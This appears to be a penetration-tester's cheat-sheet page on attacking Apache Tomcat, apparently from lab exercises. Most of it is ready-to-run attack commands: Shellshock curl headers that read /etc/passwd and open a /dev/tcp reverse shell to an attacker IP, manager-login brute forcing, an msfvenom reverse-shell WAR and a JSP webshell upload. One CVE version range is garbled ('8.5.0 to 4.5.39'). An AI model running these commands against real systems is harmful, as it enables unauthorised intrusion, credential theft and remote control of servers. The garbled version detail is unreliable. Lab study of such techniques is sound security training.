rce

Vulnerabilities

Ghostcat - Affected versions before 9.0.31, 8.5.51, and 7.0.100 CVE-2019-0232 - affected versions 9.0.0.M1 to 9.0.17, 8.5.0 to 4.5.39, and 7.0.0 to 7.0.93.

#CVE-2014-6271
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://10.129.204.231/cgi-bin/access.cgi

Attacking Tomcat

Remote code execution

Check If we can access /manager or /host-manager

Login Brute force attack

MSF module - tomcat_mgr_login

Python script
|__ -Path /manager

Python script: Tomcat manager bruteforce

RCE War file upload - tomcat manager

#Many tomcat installations provides GUI interface to manage application.
Locate at /manager/html
#You can place JSP file into war file and upload on server.

JSP file: Fuzzdb-webshell

Create a .war file

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.15 LPORT=4443 -f war > backup.war

zip -r backup.war cmd.jsp

Run commands:

curl http://web01.inlanefreight.local:8180/backup/cmd.jsp?cmd=id

Attacking tomcat CGI applications

CGI scripts used for dynamic page.

CGI scripts enumeration

gobuster dir -u http://10.129.204.231/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -x cgi

curl -i http://10.129.204.231/cgi-bin/access.cgi

Reverse shell (vulnerability exploit)

curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.38/7777 0>&1' http://10.129.204.231/cgi-bin/access.cgi

Previousfinding Nextwinrm

Last updated 1 day ago

hashtagAttacking Tomcat

hashtagCreate a .war file

hashtagRun commands:

hashtagAttacking tomcat CGI applications

Attacking Tomcat

Create a .war file

Run commands:

Attacking tomcat CGI applications